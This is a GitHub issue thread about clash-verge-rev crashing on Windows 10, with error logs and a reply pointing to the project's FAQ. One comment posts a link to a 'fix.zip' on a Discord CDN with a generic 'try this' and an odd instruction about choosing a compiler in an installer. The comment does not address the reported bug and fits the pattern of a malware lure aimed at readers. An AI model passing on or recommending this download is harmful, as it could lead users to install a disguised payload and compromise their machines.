### ISSUE TITLE
[BUG] 闪退

### ISSUE THREAD

**Issue by TXDYSYZF** [clash-verge-rev/clash-verge-rev#1670]
### 问题描述 / Describe the bug

闪退打不开面板

### 复现步骤 / To Reproduce

删除重装 1.7.3  1.7.4 1.7.5 1.7.6 1.7.7

### 操作系统 / OS

Windows

### 操作系统版本 / OS Version

win10 19045.4780

### 日志 / Log

2024-09-03 21:27:18 ERROR - error sending request for url (http://127.0.0.1:33211/unset_dns)
2024-09-03 21:27:23 ERROR - error sending request for url (http://127.0.0.1:33211/unset_dns)

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by wonfen** [comment]
看文档： https://www.clashverge.dev/faq/windows.html#_2
